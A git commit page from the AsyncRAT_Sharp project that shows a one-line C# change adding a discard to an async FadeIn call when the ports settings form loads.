Merge pull request #30 from MrDevBot/patch-3
Added discard to PortsFrm_Load's Methods.FadeIn
This commit is contained in:
commit
8269736fa2
@ -18,7 +18,7 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
|
|
||||||
private void PortsFrm_Load(object sender, EventArgs e)
|
private void PortsFrm_Load(object sender, EventArgs e)
|
||||||
{
|
{
|
||||||
Methods.FadeIn(this, 5);
|
_ = Methods.FadeIn(this, 5);
|
||||||
|
|
||||||
if (Properties.Settings.Default.Ports.Length == 0)
|
if (Properties.Settings.Default.Ports.Length == 0)
|
||||||
{
|
{
|
||||||
|
Loading…
x
Reference in New Issue
Block a user